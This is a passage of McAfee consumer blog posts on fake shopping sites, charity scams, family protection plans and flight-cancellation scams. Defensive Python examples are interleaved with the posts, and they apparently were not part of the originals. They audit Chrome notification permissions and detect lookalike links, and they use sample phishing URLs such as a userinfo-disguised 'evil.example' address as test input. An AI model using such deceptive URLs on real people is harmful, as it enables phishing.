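    for pattern, entry in notification_exceptions(new_prefs).items():
        if entry.get("setting") == ALLOW and origin_of(pattern) not in set(keep):
            entry["setting"] = BLOCK
    return new_prefs


def audit(prefs_json: str, keep=()):
    """Parse a Preferences file; return (allowed before, allowed after, cleaned prefs)."""
    prefs = json.loads(prefs_json)
    before = allowed_notification_sites(prefs)
    new_prefs = revoke_notifications(prefs, keep)
    return before, allowed_notification_sites(new_prefs), new_prefs


if __name__ == "__main__":
    # Real use: read %LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences
    # (Windows) with open(path, encoding="utf-8"), Chrome closed and a backup taken.
    before, after, cleaned = audit(SAMPLE_PREFERENCES,
                                   keep={"https://calendar.example.com:443"})
    print("allowed before:", before)
    print("allowed after :", after)
    print(json.dumps(cleaned, indent=2))
```

Run it against the sample and the scam origin is the one that drops out of the allowed list; write `cleaned` back over a backed-up `Preferences` only with Chrome fully closed.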

    Steps to take if you visited or purchased from a fake site

    Be prepared and know how to respond quickly when something doesn’t feel right. If you suspect you’ve encountered a fake website, trust your instincts and take these protective steps immediately.

    1. Close the browser: Quit it from the keyboard with Alt+F4 (Windows) or Command+Q (Mac), or close just the tab with Ctrl+W (Windows) or Command+W (Mac), rather than clicking anything on the page.
    2. Run a comprehensive security scan: If you suspect a virus or malware, disconnect from the internet to prevent data transmission. Conduct a full scan using your antivirus software to detect and remove any potential threats that may have been downloaded.
    3. Contact your credit card issuer: Call the number on the back of your card and report the fraudulent charges; most issuers offer zero-liability protection for unauthorized charges. Under federal law you have 60 days from the statement date to dispute a charge, and the issuer can reverse payments made to the fake store. Consider requesting a temporary freeze on your account while the investigation proceeds.
    4. Cancel your credit card: Request a replacement card with a new number to give you a fresh start. Your card issuer can expedite the request if needed, often within 24-48 hours.
    5. Document everything thoroughly: Save all emails, receipts, order confirmations, and screenshots of the fake website before it potentially disappears. This documentation will be crucial for your chargeback and insurance claims, and any legal proceedings.
    6. Update passwords on other accounts: Scammers often test stolen credentials across multiple platforms, so if you reused the same password on the fake site that you use elsewhere, change those passwords immediately. Enable two-factor authentication on important accounts like email, banking, and social media.
    7. Stay alert for follow-up scams: Scammers may attempt to contact you via phone, email, or text claiming to “resolve” your situation through fake shipping notifications, additional payments to “release” your package, or “refunds” on your money in exchange for personal information.
    8. Monitor your credit and financial accounts: Keep a close eye on your bank and credit card statements for several months and place a fraud alert on your credit reports through one of the three major credit bureaus (TransUnion, Equifax, or Experian); the bureau you contact is required to notify the other two. Consider a credit freeze for maximum protection.
    9. Check for legitimate alternatives: If you were trying to purchase a specific product, research authorized retailers or the manufacturer’s official website. Verify business credentials, secure payment options, and return policies before making new purchases.

    Report a scam website, email, or text message

    • Federal Trade Commission: Report fraudulent websites to the FTC, which investigates consumer complaints and uses this data to identify patterns of fraud and take enforcement action against scammers.
    • FBI’s Internet Crime Complaint Center: Submit detailed reports to the IC3 for suspected internet crimes. IC3 serves as a central hub for reporting cybercrime and coordinates with law enforcement agencies nationwide.
    • State Attorney General: If the fake store claimed to be located in your state, consider reporting to your state attorney general’s office, as these have dedicated fraud reporting systems and can take action against businesses operating within state boundaries. Find your state’s reporting portal through the National Association of Attorneys General website.
    • Domain registrar, hosting provider, social media: Look up the website’s registration details using a WHOIS tool, then report abuse to both the domain registrar and web hosting company. Most providers have dedicated abuse reporting emails and will investigate violations of their terms of service. If the fake page is on social media, you can report it to the platform to protect other consumers.
    • Search engines: Report fraudulent sites to Google through their spam report form and to Microsoft Bing via their webmaster tools to prevent the fake sites from appearing in search results.
    • The impersonated brand: If scammers are impersonating a legitimate company, report directly to that company’s fraud department or customer service. Most brands have dedicated channels for reporting fake websites and will work to shut them down.
    • Share your experience to protect others: Leave reviews on scam-reporting websites such as the Better Business Bureau’s Scam Tracker or post about your experience on social media to warn friends and family. Your experience can help others avoid the same trap and contribute to the broader fight against online fraud.
    • Essential evidence to gather:
      • Full website URL and any redirected addresses
      • Screenshots of the fraudulent pages, including fake logos or branding
      • Transaction details, if you made a purchase (receipts, confirmation emails, payment information)
      • Email communications from the scammers
      • Date and time when you first encountered the site
      • Any personal information you may have provided
    • Additional reporting resources: CISA maintains an updated list of reporting resources, while the Anti-Phishing Working Group investigates fake sites that appear to be collecting personal information fraudulently. For text message scams, forward the message to 7726 (SPAM).

    Final thoughts

    Recognizing fake sites and emails becomes easier with practice. The key is to trust your instincts—if something feels suspicious or too good to be true, take a moment to verify through official channels. With the simple verification techniques covered in this guide, you can confidently navigate the digital world and spot fake sites and emails before they cause harm.

    Your best defense is to make these quick security checks a regular habit—verify URLs, look for secure connections, and trust your instincts when something feels off. Go directly to the source or bookmark your most frequently used services and always navigate to them. Enable two-factor authentication on important accounts, and remember that legitimate companies will never ask for sensitive information via email. Maintaining healthy skepticism about unsolicited communications will protect not only your personal information but also help create a safer online environment for everyone.

    For the latest information on fake websites and scams and to report them, visit the Federal Trade Commission’s scam alerts or the FBI’s Internet Crime Complaint Center.

    The post Ways to Tell if a Website Is Fake appeared first on McAfee Blog.

    How to Spot Charity Scams and Donate Safely this Giving Season

    By: McAfee

    The holidays are the season of giving. Unfortunately, it’s also the season when scammers try to cash in on the spirit of generosity.

    If you’re seeing a heartfelt charity ad on social media, a touching email, or a surprise text asking you to donate, it’s worth pausing for a moment. Is it genuine charity—or a scam built to tug at your heartstrings?

    The good news: staying safe doesn’t mean stopping your generosity. With a few quick checks, you can give confidently and protect yourself.

    What is charity fraud?

    Charity fraud is when scammers pose as legitimate nonprofits—or misuse the name of a real charity—to trick people into donating money or giving away personal information.

    In some cases, the organization is completely fake. In others, it’s a real charity that uses donations in misleading or unethical ways, passing very little money to the actual cause.

    Type 1: Fully fake charities

    The first type involves flat-out fraud, where the organization is a front for a scam, through and through. Any money you give goes straight into the scammer’s pocket. As does your personal and payment info, which can lead to further fraud.

    Type 2: Low impact “charities”

    These are real, registered charities, but they keep most of the money they raise for overhead rather than for the cause.

    This second type often involves questionable practices by the organization. According to the Better Business Bureau, reputable organizations keep 35% or less of their funds for operations.

    Meanwhile, some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. (For a closer look at some examples, the independent watchdog group Charity Watch published a blog highlighting some of the worst charities they audited in 2024.)

    Both types play on your emotions and urge you to donate right now. As with so many scams and shady deals on the internet, a sense of urgency is central to their message.

    How to spot a charity scam

    1. Look for a dot-org domain

    For starters, reputable charities often use a dot-org domain rather than dot-com or one of the hundreds of other extensions available today. Treat this as a weak signal, though: anyone can register a dot-org, so a charity-looking domain still needs to match the website listed for that charity by the watchdog resources below.
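The “verify URLs” habit from the earlier post on fake websites and the dot-org check above both reduce to a few mechanical tests. The Python function below is an added example (not code from the original posts or from McAfee) that flags the common lookalike tricks: a plain-http link, a punycode (`xn--`) label that renders as non-Latin letters, a `user@` prefix that hides the real host, and a known brand name appearing in a hostname whose registrable domain is not one the brand actually uses. The brand allowlist and the two-label approximation of the registrable domain are assumptions made for the example; real code would use the Public Suffix List.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed allowlist for this example: brand keyword -> registrable domains the
# brand really uses. Real code would load a maintained list.
KNOWN_BRANDS = {
    "mcafee": {"mcafee.com"},
    "usps": {"usps.com"},
}


@dataclass
class UrlVerdict:
    host: str
    registrable_domain: str
    tld: str
    warnings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.warnings)


def registrable_domain(host: str) -> str:
    """Approximate the registrable domain as the last two labels.

    Assumption for the example: no multi-label public suffixes (co.uk, com.au).
    Use the Public Suffix List in production.
    """
    labels = host.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def decode_label(label: str) -> str:
    """Best-effort ToUnicode for an xn-- label so the warning shows what the user sees."""
    try:
        return label.encode("ascii").decode("idna")
    except UnicodeError:
        return label


def check_url(url: str) -> UrlVerdict:
    """Run the lookalike checks and return a verdict with zero or more warnings."""
    if "://" not in url:
        url = "https://" + url          # bare hostnames are treated as https links
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    verdict = UrlVerdict(host=host, registrable_domain=reg, tld=reg.rsplit(".", 1)[-1])

    if parts.scheme != "https":
        verdict.warnings.append("connection is not https")
    if "@" in parts.netloc:
        # https://www.mcafee.com@evil.example/ really goes to evil.example
        verdict.warnings.append("userinfo before the host hides the real destination")
    for label in host.split("."):
        if label.startswith("xn--"):
            verdict.warnings.append(
                f"punycode label {label} renders as {decode_label(label)!r}")
    for brand, domains in KNOWN_BRANDS.items():
        # mcafee.com.secure-renewal.example: brand in the name, wrong registrable domain
        if brand in host and reg not in domains:
            verdict.warnings.append(
                f"{brand!r} appears in {host} but the registrable domain is {reg}")
    return verdict


if __name__ == "__main__":
    for link in ("https://www.mcafee.com/",
                 "https://mcafee.com.secure-renewal.example/login",
                 "http://usps-tracking-fee.example/pay",
                 "https://xn--80ak6aa92e.com/",
                 "https://www.mcafee.com@evil.example/",
                 "https://fightcybercrime.org/about/donate/"):
        v = check_url(link)
        print(("SUSPICIOUS " if v.suspicious else "ok         ") + link)
        for w in v.warnings:
            print("    -", w)
```

The `tld` field is what the dot-org heuristic looks at; note that in the sample run the charity link passes only because its registrable domain is what the charity actually publishes, not because of the extension alone.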

    2. Research the organization

    Charities leave a paper trail, one that can get audited. And fake ones won’t leave a trail at all. With a quick look at some reputable online resources, you can quickly find out if the charity you want to support is legit.

    In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities. You can also look up a charity’s Form 990 tax return online.

    3. Take your time

    This goes hand-in-hand with the above. If you feel like you’re being rushed to donate, it could be a sign of a scam. Step back and do your research with a few clicks to the resources listed above.

    4. Pay with a credit card

    This protects you in two ways. If you fall victim to a scam, you can contest the charges with your credit card company. And if a scammer tries to use your card again for other purchases, you can contest those too. In the U.S., credit cards also offer protection that debit cards don’t, thanks to the Fair Credit Billing Act (FCBA): your liability for unauthorized charges on a credit card is capped at $50, and you have 60 days from the statement date to dispute a charge with your issuer.

    5. Avoid sketchy payment methods

    The following is a sure-fire red flag: requests for payment in cash, gift cards, cryptocurrency, or wire transfers. Never pay a charity this way, and treat any online merchant that insists on these methods with the same suspicion.

    6. Donate directly

    Better yet, donate directly. Rather than respond to calls, ads, emails or texts, donate on your terms. After you give your possible donation some time and thought, you can go directly to the website of a charitable organization that you’ve researched.

    And here’s how McAfee can help you stay safer still.

    Get a scam detector. You can combine your healthy skepticism and awareness with the right technology, like our Scam Detector and Web Protection.

    Both will alert you if a link you received might take you to a sketchy site, and they’ll block those sites if you accidentally tap or click on a bad link.

    Clean up your personal info online. Scams over email, phone, and text all require the same thing: your contact info.

    In many cases, scammers get it from data broker sites. Data brokers buy, collect, and sell detailed personal info, which they compile from several public and private sources, such as local, state, and federal records, plus third parties like supermarket shopper’s cards and mobile apps that share and sell user data.

    Moreover, they’ll sell it to anyone who pays for it, including people who’ll use that info for scams. You can help reduce those scam texts and calls by removing your info from those sites. Our Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info.

    Monitor your identity and credit. The problem with many scams is that you only find out about them once the damage is done, like when a scammer uses your phished card number to make additional purchases in your name.

    Actively monitoring your identity and credit can spot a problem before it becomes an even bigger one. You can take care of both easily with our credit monitoring and identity monitoring.

    Additionally, our identity theft coverage can help if the unexpected happens, with up to $2 million in identity theft coverage and identity restoration support if you’re determined to be a victim of identity theft.

    You’ll find these protections, and plenty more, in McAfee+.

    A safe way to support the fight against cybercrime

    If you want to give back and help protect people from online fraud, McAfee has partnered with Fight Cyber Crime, a legitimate U.S. nonprofit dedicated to helping victims of online scams.

    You might remember them from our Scam Stories partnership earlier this year, sharing real stories from real scam victims to raise awareness about threats facing us every day on and offline.

    Why we recommend them

    • They provide free support and recovery guidance to scam victims.
    • They raise nationwide awareness about cybercrime.
    • They’re a vetted, established organization doing real work in online safety.

    How you can help

    Visit their site to learn more or make a donation: https://fightcybercrime.org/about/donate/

    Supporting validated charities like Fight Cyber Crime is one way to make a real impact this holiday season—without putting yourself at risk.

    The post How to Spot Charity Scams and Donate Safely this Giving Season appeared first on McAfee Blog.

    Protect the Whole Family with McAfee+ Ultimate Family Plan

    By: McAfee

    Many content creators highlight the differences between today’s most prominent generations: the Silent Generation, baby boomers, Generation X, millennials, and Generations Z and Alpha. No generation seems to have much in common with the others. In truth, there is something everyone can agree on: identity and online privacy protection matter. Young or old, cybercriminals don’t discriminate in whom they target, though some generations are more prone to certain scams than others. Educating yourself and your family members about current cyberthreats is the first step to defending against them. In this guide, we’ll take a look at how to protect every age group from online threats.

    Family protection matters

    Your family faces an onslaught of online threats that didn’t exist just a decade ago, and the list keeps growing. The FBI’s 2024 Internet Crime Report shows that Americans alone have lost over $18 billion to cybercrime since 2020. That’s why protecting your family entails more than just antivirus software. Digital protection now encompasses safeguarding your household’s online privacy, monitoring for identity threats, and securing every family device that connects to the internet. Here is how the risks differ for each family member:

    • Your children and teens, 97% of whom own a smartphone, face vulnerabilities through social media platforms, gaming networks, and school devices. They’re naturally curious and trusting, making them prime targets for social engineering scams disguised as friend requests or free game downloads.
    • Adults in your household juggle multiple online responsibilities—banking, shopping, work communications, and managing family accounts. The rush of daily life can make you more susceptible to phishing emails that look legitimate or malicious links embedded in seemingly innocent messages.
    • Senior family members often become targets because they may be less familiar with evolving online scams. In 2024, the FTC received 147,127 complaints from adults aged 60 years and above, resulting in $4.8 billion in losses. But since many of these incidents go unreported, that figure may actually go as high as $61.5 billion.

    Criminals adapt their tactics to whoever they’re targeting. With the right safeguards in place, your family can fully embrace the opportunities that technology offers: your kids can safely research school projects, your teens can connect with friends responsibly, and you can manage your household efficiently online. The most effective approach is a safety net of layered protection that works across all your devices and takes each family member’s technology usage into account, whether that’s helping your teenager safely explore career interests online, keeping your online banking secure, or giving grandparents peace of mind when video chatting with distant relatives. In practice this means combining real-time threat detection, safe browsing tools, identity monitoring, and secure connections through a virtual private network.

    Distinct protections per age group

    No two generations use technology the same way—and cybercriminals know it. Children, teens, adults, and seniors each face unique digital risks shaped by their habits, confidence levels, and online environments. That’s why effective cybersecurity isn’t one-size-fits-all. Tailoring protection to each age group ensures that everyone—from curious kids to tech-savvy adults—can navigate the digital world safely and confidently.

    Safeguard childhood

    Cybercriminals can buy Social Security Numbers (SSNs) of minors on the dark web or gather them through medical records or school system breaches. A child’s SSN is valuable to a cybercriminal because the theft can go undetected for years, since children aren’t yet opening credit cards or applying for mortgages. It’s never too early to start identity monitoring. For the same reason, consider placing a credit freeze on your child’s behalf, since they won’t need credit for several years. A freeze stops lenders from pulling your child’s credit file, so nobody, criminals included, can open new accounts in their name, and it won’t negatively affect their credit score.

    Digital safety with tween and teen independence

    Once your child becomes a teenager, they can be allowed to open their first email addresses and social media profiles independently. It’s an important life lesson in organization, responsibility, and digital literacy. However, these platforms could open them to risks such as cyberbullying, fake news, and social engineering. The best way to avoid being cyberbullied is through education. Ensure that your tweens and teens who spend unsupervised time on their devices know what to do if they encounter cyberbullying. The best course of action is to report the incident to an adult and, in the meantime, to suspend their accounts.

    Prepare the seniors

    Cybercriminals often seek out seniors as easy targets for online scams because they are typically less digitally savvy. They may not realize that some emails in their inbox could be sent by someone with bad intentions. What can start out as a friendly email pal can quickly spiral into divulging sensitive personal information or sending huge sums of money to a criminal. The best way to prepare the seniors in your life for online safety is to impart a few, easy-to-follow absolutes. Start with these three rules:

    • Never tell anyone your password. Neither your bank, your tax filing service, nor the IRS will ever need it.
    • Never divulge your SSN over email.
    • Never send money to a stranger, no matter how much their “sob story” tugs at your heartstrings.

    Manage what’s right for your family online

    Creating a safer digital environment for your children doesn’t require you to become a tech expert. With the right approach and tools, you can establish healthy digital boundaries that protect your children while allowing them to enjoy the benefits of our connected world.

    Start with open conversation

    Before implementing any technical measures, have honest discussions with your family about online safety to build trust and help you recognize each family member’s digital journey. Explain that protective measures will not restrict freedom, but reduce risks such as phishing attempts, malware infections, and exposure to inappropriate content.

    Create a family technology agreement

    A family tech agreement serves as your household’s digital constitution. Work together to establish rules about screen time, appropriate websites, social media use, and consequences for breaking agreements, including guidelines about sharing personal information, downloading apps, and what to do if they encounter something concerning online.

    Enable parental controls

    Most devices and platforms offer robust parental control features. iOS devices’ Screen Time and Android’s Family Link allow you to set app limits and content restrictions, while Windows and macOS can filter content and set time limits. The Federal Communications Commission recommends router-level filtering as the first line of defense because it automatically protects all devices connected to your network.

    Set up app and content filters

    Configure age-appropriate content filters on streaming services, gaming platforms, and app stores. Netflix, Disney+, and other services allow you to create child-friendly profiles with content restrictions, while gaming consoles like PlayStation, Xbox, and Nintendo Switch include comprehensive parental controls for game ratings, online interactions, and spending limits. For web browsing, enable SafeSearch on Google, Bing, and other search engines to keep harmful content from appearing in search results.

    Optimize privacy settings across platforms

    Because social media platforms often favor data collection over privacy, it is critical that you adjust privacy settings on all social media accounts and apps your family uses. Turn off location sharing and disable targeted advertising when possible, and limit who can contact your children online. To reduce younger children’s exposure to social engineering attempts and inappropriate contact from strangers, make their profiles private by default and require approval for new followers or friend requests.

    Deploy safe browsing tools

    Your teen could be so focused on downloading a “free” TV or video game that they may not recognize the signs of malicious sites such as typos, blurry logos, or incredible offers. Trustworthy safe browsing extensions and software could protect your teen from these unsafe downloads, as well as from risky websites, hidden malware, phishing, and social media bots. Safe browsing extensions could teach your family members to develop better security instincts when they see warnings about suspicious URLs, poor website design, and too-fantastic offers.

    Make protection age-appropriate

    Tailor your approach to each family member’s age, digital maturity, and comfort level with technology. Younger children will need more restrictive settings and closer supervision, while teenagers are more open when they understand the reason behind the rules and can have some autonomy with clear consequences for misuse.

    Regular check-ins and updates

    As technology evolves, ongoing conversation about responsible usage will allow you to address new apps, games, or websites your family wants to explore. Set a monthly family meeting to discuss online experiences, review your technology agreement, and adjust settings as needed. When you implement these strategies consistently, your family will experience fewer security incidents, reduced exposure to inappropriate content, and better digital habits overall. These tools and strategies work best when combined with ongoing communication and a family culture that prioritizes both digital exploration and safety. In addition, children who grow up with these protections develop stronger security awareness and are less likely to fall victim to online scams as they become more independent digital users.

    Mindfulness is safety

    As an adult, you typically have better street smarts than teens. However, the daily rush of juggling work, social obligations, and running a household can leave you with little time to spare, and living life in the fast lane makes you more susceptible to scams, phishing, malware, and computer viruses. The best way to avoid these digital threats is simple: slow down. Take your time with any message from someone you don’t know or have never met in person. If you feel even an iota of suspicion, don’t engage with the sender; delete the message. If it’s important, the person or organization will follow up. To fully protect your connected devices and the personally identifiable information they store, consider investing in safe browsing, antivirus software, and identity monitoring and restoration services to catch any threats that slip past your watchful eye.

    Modern antivirus for today’s cyberthreats

    While you might think your devices are already secure, modern cyberthreats have evolved far beyond what traditional built-in protections can handle. In response, antivirus solutions have transformed into intelligent security systems that provide comprehensive, real-time protection using behavioral analysis, machine learning, and cloud-based threat detection. These technologies actively identify and block phishing attacks, malware, ransomware, and malicious websites that traditional security measures often miss.

    While operating systems such as Windows and macOS include basic security features, they’re designed as general safeguards rather than comprehensive family protection solutions. Built-in protections typically focus on known threats and are weaker against zero-day attacks, sophisticated phishing schemes, and emerging malware variants that cybercriminals specifically design to evade standard defenses.

    Consider a few everyday family scenarios. Your teenager brings home a school laptop that may have been exposed to threats through shared networks or downloads from classmates. The family tablet everyone uses for streaming and games becomes a potential entry point for malicious apps or compromised websites. When you connect to public Wi-Fi at a coffee shop, airport, or hotel during family travel, your devices are exposed to network-based attacks that built-in protections weren’t designed to handle.

    Your family needs a security solution that monitors all of your devices continuously, learns each member’s online behavior patterns, and adapts its protection accordingly: blocking that suspicious email before your spouse clicks on it, preventing your child from accidentally downloading malware disguised as a game, and keeping your smart home devices secure. The best value comes from bundled services that address your family’s complete digital life. Identity monitoring services watch for signs that your family members’ personal information has been compromised in data breaches. A family VPN encrypts your internet connection, protecting sensitive information when family members use public Wi-Fi for school projects, work calls, or entertainment. This integrated protection safeguards not just individual devices but your entire family’s digital ecosystem. With cybercrime damages projected to keep growing each year, investing in comprehensive family protection is one of the smartest decisions you can make for your household’s digital well-being.

    The ultimate protection plan

    Get the whole family committed to safer and more private online lives with the help of McAfee+ Ultimate Family Plan. This plan covers up to six individuals in your family with an entire suite of comprehensive privacy, identity, and device security features. The plan also includes preventive measures to fight online crime, such as safe browsing tools, an advanced firewall, unlimited VPN, and antivirus software for unlimited devices. Your family can also receive up to $2 million in identity theft recovery and $50,000 in ransomware coverage. With the McAfee+ Ultimate Family Plan, device security extends across unlimited computers, smartphones, and tablets, while its advanced antivirus software automatically updates to defend you against the latest threats. Safe browsing tools block malicious websites before they can cause harm, and the unlimited VPN encrypts internet connections on public networks, while the built-in firewall monitors incoming and outgoing traffic. All your family’s login credentials on all devices will be secure with password management, while secure cloud storage protects important documents and family photos. Real-time alerts notify you immediately when scams are detected or suspicious activity occurs.

    Protection tailored for every family member

    Every family member faces different online risks, shaped by their age, habits, and digital experience. Children need safeguards against identity theft and unsafe content, while teens require protection that balances independence with security. Adults juggle multiple connected accounts that demand advanced monitoring, and seniors benefit from simplified defenses against scams and fraud. A one-size-fits-all approach no longer works. The McAfee+ Ultimate Family Plan effectively adapts to each person’s unique digital life, ensuring that everyone stays safe, confident, and connected online:

    • Your young children’s Social Security Numbers will be monitored for misuse, while your teens will be protected from risky downloads and phishing attempts and still maintain their online autonomy.
    • The adults in your family will benefit from comprehensive identity theft protection that monitors credit reports, bank accounts, and personal information across the dark web. Meanwhile, your email and social media accounts will be continuously surveilled for unauthorized access.
    • Seniors will receive simplified alerts and protection specifically designed for common online scams and be supported by top-notch identity restoration specialists to resolve any issues that arise.

    Quick start checklist

    Getting started with the McAfee+ Ultimate Family Plan takes only minutes. Simply follow this short list to start protecting your family’s digital life:

    • Account creation: Create a master account at mcafee.com using the primary family email address. This account becomes your central dashboard for managing all family members’ protection.
    • Add family profiles: Add family profiles by entering each member’s basic information. You can include up to six family members with personalized settings—spouses, children, and other household members. Each person receives their own unique protection settings based on their age and device usage patterns.
    • Install on devices: Download the McAfee app on every family device—computers, phones, and tablets. The software automatically synchronizes with your primary family account and begins protecting all devices immediately. The installation process typically completes in under five minutes per device.
    • Enable key protections: Once installation is done, you can start activating identity monitoring, VPN, and safe browsing for each member.
    • Turn on alerts: You will also need to configure notification preferences for each device to activate alerts when security events and threats occur.
    • Test your setup: To see if the installation works, run initial antivirus scans on all devices. You can also test the VPN to ensure that the connection works.

    Essential tips to protect your family online

    A comprehensive online security solution combined with best digital practices can go a long way in protecting your loved ones from identity theft, scams, and online risks. These essential tips will help you strengthen your family’s digital defenses, build safer online routines, and give everyone the confidence to explore the internet securely.

    • Use unique passwords and multi-factor authentication: Doing this prevents hackers from accessing multiple accounts even if one password is compromised. Enable MFA on all critical accounts.
    • Enable automatic updates on all devices: Configure automatic security updates to keep your family’s devices protected against the latest security threats without requiring constant manual action from you.
    • Turn on safe browsing and firewall protection: Enabling safe browsing features blocks malicious websites and unauthorized network access before they can harm your family’s devices and data.
    • Use a VPN on public Wi-Fi networks: A VPN protects your data on public networks by encrypting your family’s internet connection in hotel, coffee shop, or airport Wi-Fi to prevent data theft.
    • Set device-level parental controls: Configure age-appropriate content filters to protect children from inappropriate content while teaching responsible digital habits.
    • Consider freezing minors’ credit reports: Credit freezing will prevent identity thieves from opening fraudulent accounts in your children’s names, as they won’t need credit yet.
    • Teach family members to recognize phishing red flags: Educating your family to identify common phishing tactics empowers them to spot red flags in suspicious emails, texts, and websites that try to steal personal information.
    • Back up important family files regularly: Create a comprehensive backup strategy to ensure precious photos, documents, and memories are safe even if devices are lost, stolen, or infected with ransomware.
    • Monitor identities for the whole family: Use family plans to catch suspicious activity early, allowing you to respond quickly if someone’s personal information is compromised.

    Final thoughts

    Protecting your family’s digital life doesn’t have to be overwhelming. With the right knowledge, best digital practices, and a comprehensive security solution like McAfee+ Ultimate Family Plan, you can safeguard everyone against today’s online threats. A comprehensive family plan will help you enable safe browsing tools, monitor your family members’ identities, educate each family member about their unique risks, and build a strong foundation of online security. Start implementing these protective measures today, and stay informed about emerging threats and security best practices to keep your loved ones safe in our connected world.

    The post Protect the Whole Family with McAfee+ Ultimate Family Plan appeared first on McAfee Blog.

    This Week in Scams: DoorDash Breach and Fake Flight Cancellation Texts

    By: McAfee

    Leading off our news on scams this week, a heads-up for DoorDash users, merchants, and Dashers too. A data breach of an undisclosed size may have impacted you.

    Per an email sent by the company to “affected DoorDash users where required,” a third party gained access to data that may have included a mix of the following:

    • First and last name
    • Physical address
    • Phone number
    • Email address

    You might have got the email too. And even if you didn’t, anyone who’s used DoorDash should take note.

    As to the potential scope of the breach, DoorDash made no comment in its email or a post on their help site. Of note, though, is that one of the help lines cited in their post mentions a French-language number—implying that the breach might affect Canadian users as well. Any reach beyond the U.S. and Canada remains unclear.

    Per the company’s Q2 financial report this year, it serves “hundreds of thousands of merchants, tens of millions of consumers, and millions of Dashers across over 30 countries every month.” Stats published elsewhere put the user base at more than 40 million people, which includes some 600,000 merchants.

    The company underscored that no “sensitive” info like Social Security Numbers (and potentially Canadian Social Insurance Numbers) was involved in the breach. This marks the third notable breach at the well-known delivery service, following incidents in 2019 and 2022.

    Image of DoorDash email about data breach.

    What to do if you think you got caught up in the DoorDash breach

    While the types of info involved here appear to be limited, any time there’s a breach, we suggest the following:

    Protect your credit and identity. Checking your credit and getting identity theft protection can help keep you safer in the aftermath of a breach. Further, a security freeze can help prevent identity theft if you spot any unusual activity. You can get all three in place with our McAfee+ Advanced or Ultimate plans.

    Keep an eye out for phishing attacks. With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info. As with any text or email you get from a company, make sure it’s legitimate before clicking or tapping on any links. Instead, go straight to the appropriate website or contact them by phone directly. Also, protections like our Scam Detector and Web Protection can alert you to scams and sketchy links before they take you somewhere you don’t want to go.

    Update your passwords and use two-factor authentication. Changing your password is a strong preventive measure. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager helps you stay on top of it all while also storing your passwords securely.

    Attention travelers: Now boarding, a rise in flight cancellation scams

    Even as the FAA lifted recent flight restrictions on Monday morning, scammers are still taking advantage of lingering uncertainty, and upcoming holiday travel, with a spate of flight cancellation scams.

    How the scam works

    Fake cancellation texts

    The first comes via a text message saying that your flight has been cancelled and you must call or rebook quickly to avoid losing your seat—usually in 30 minutes. It’s a typical scammer trick, where they hook you with a combination of bad news and urgency. Of course, the phone number and the site don’t connect you with your airline. They connect you to a scammer, who walks away with your money and your card info to potentially rip you off again.

    Fake airline sites in search results

    The second uses paid search results. We’ve talked about this trick in our blogs before. Because paid search results appear ahead of organic results, scammers spin up bogus sites that mirror legitimate ones and promote them in paid search. In this way, they can look like a certain well-known airline and appear in search before the real airline’s listing. With that, people often mistakenly click the first link they see. From there, the scam plays out just as above as the scammer comes away with your money and card info.

    How to avoid flight cancellation scams

    Q: How can I confirm whether my flight is really canceled?
    A: Check directly in your airline’s official app or website. Never click links in texts or emails.

    Q: How can I spot a fake airline search result?
    A: Look for “Ad”/“Sponsored,” confirm the URL, and check that the site uses HTTPS, not HTTP.

    Q: Is there a tool that flags fake booking sites?
    A: Scam-spotting tools like Scam Detector and Web Protection can identify sketchy links before you click.

    In search, first isn’t always best.

    Look closely to see if your top results are tagged with “Sponsored” or “Ad” in some way, realizing it might be in fine print. Further, look at the web address. Does it start with “https” (the “s” means secure)? Many scam sites simply use an unsecured “http” site. Also, does the link look right? For example, if you’re searching for “Generic Airlines,” is the link the expected “genericairlines dot-com” or something else? Scammers often try to spoof it in some way by adding to the name or by creating a subdomain like this: “genericairlines.rebookyourflight dot-com.”
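The subdomain trick above works because people read a hostname left to right and stop at the brand name, while the part that matters is the rightmost registrable domain. The following is an added example (not McAfee code, and not a McAfee product feature) that makes that comparison explicit in Python’s standard library: it extracts the registrable domain from a link, compares it with the domain the traveler expects, and reports the “https” check from the post as a secondary signal. It goes slightly beyond the post by applying the same check to the domain part of an e-mail sender address. “genericairlines.com” is the post’s own placeholder airline; the two-label suffix set is a constructed, deliberately incomplete stand-in for the Public Suffix List, and a scheme-less link is assumed to be plain http.

```python
"""Check whether a link or sender really belongs to the expected domain.

Added example, not from the original post. Registrable-domain extraction
here is a simplified stand-in for a real Public Suffix List lookup.
"""
from urllib.parse import urlsplit

# Constructed, incomplete set of public suffixes that span two labels.
# Production code should consult the Public Suffix List instead.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}


def registrable_domain(host: str) -> str:
    """Return the portion of a hostname that a registrant actually owns.

    'www.genericairlines.com'              -> 'genericairlines.com'
    'genericairlines.rebookyourflight.com' -> 'rebookyourflight.com'
    'www.example.co.uk'                    -> 'example.co.uk'
    """
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return host.lower()
    if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES and len(labels) >= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def check_link(url: str, expected_domain: str) -> dict:
    """Classify a link against the domain the user expects to land on.

    The registrable domain is the primary signal; the scheme check from the
    post is reported too, but a valid https certificate alone proves nothing
    about who runs the site.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = parts.hostname or ""
    actual = registrable_domain(host)
    expected = registrable_domain(expected_domain)
    brand = expected.split(".")[0]
    findings = []
    if actual != expected:
        if brand in host:
            # The brand name is present, but only as a subdomain or lookalike.
            findings.append("expected brand appears only as a subdomain or lookalike")
        findings.append(f"registrable domain is {actual!r}, expected {expected!r}")
    if parts.scheme != "https":
        findings.append("not using https")
    return {
        "host": host,
        "registrable_domain": actual,
        "matches_expected": actual == expected,
        "findings": findings,
    }


def sender_matches(address: str, expected_domain: str) -> bool:
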